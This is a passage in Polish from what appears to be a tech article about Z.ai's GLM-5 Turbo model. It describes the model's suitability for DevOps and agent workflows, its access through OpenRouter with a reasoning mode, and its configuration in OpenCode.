    W obszarze DevOps i automatyzacji hostingowej GLM-5 Turbo mógłby napędzać agentów zarządzających infrastrukturą. Na przykład: monitorowanie logów, automatyczne skalowanie zasobów w odpowiedzi na metryki czy zarządzanie złożonymi pipeline'ami wdrożeniowymi – wszystko to wymaga długich, stabilnych łańcuchów decyzyjnych i interakcji z wieloma systemami.

    Testy wspominają też o dobrych wynikach w benchmarkach programistycznych (OpenCode, Kilo Code), co potwierdza jego przydatność w zadaniach związanych z kodowaniem.

    Jak zacząć z GLM-5 Turbo? Dostępność na OpenRouter

    Jak zacząć z GLM-5 Turbo? Dostępność na OpenRouter

    Najprostsza droga do przetestowania możliwości modelu prowadzi przez OpenRouter. Platforma ta udostępnia GLM-5 Turbo przez swoje API, co oznacza, że deweloperzy mogą zintegrować go ze swoimi aplikacjami czy narzędziami wewnętrznymi.

    Co ważne, OpenRouter obsługuje tzw. tryb reasoningu dla tego modelu. W praktyce, wysyłając zapytanie z parametrem reasoning, możemy poprosić model o zwrócenie nie tylko finalnej odpowiedzi, ale też jego wewnętrznego procesu rozumowania krok po kroku. To nieoceniona funkcja przy debugowaniu agentów lub budowaniu systemów, które wymagają iteracyjnej samokorekty i planowania.

    Model jest też konfigurowalny w innych narzędziach, na przykład we frameworku OpenCode, gdzie można go wybrać jako silnik poprzez odpowiedni wpis w pliku konfiguracyjnym JSON. Pojawił się również na innych platformach, jak Krater.ai, co poszerza możliwości dostępu.

    Podsumowanie: specjalista w świecie agentów AI

    GLM-5 Turbo od Z.ai to ciekawy przykład specjalizacji w świecie dużych modeli językowych. Zamiast walczyć o tytuł „najmądrzejszego” modelu w ogólnych testach, jego twórcy postawili na bycie najbardziej niezawodnym w konkretnej, szybko rosnącej niszy: autonomicznych agentów AI.

    Jego pojawienie się na OpenRouter demokratyzuje dostęp do tej technologii. Dla zespołów deweloperskich pracujących nad zaawansowaną automatyzacją, vibe codingiem czy systemami DevOps może to być komponent wart przetestowania. Stabilność w wywoływaniu narzędzi, zdolność do zarządzania długimi procesami i optymalizacja pod realne workflowy to argumenty, które trudno zignorować. To nie jest rewolucja dla każdego użytkownika AI, ale dla twórców agentów – może być bardzo istotnym krokiem naprzód.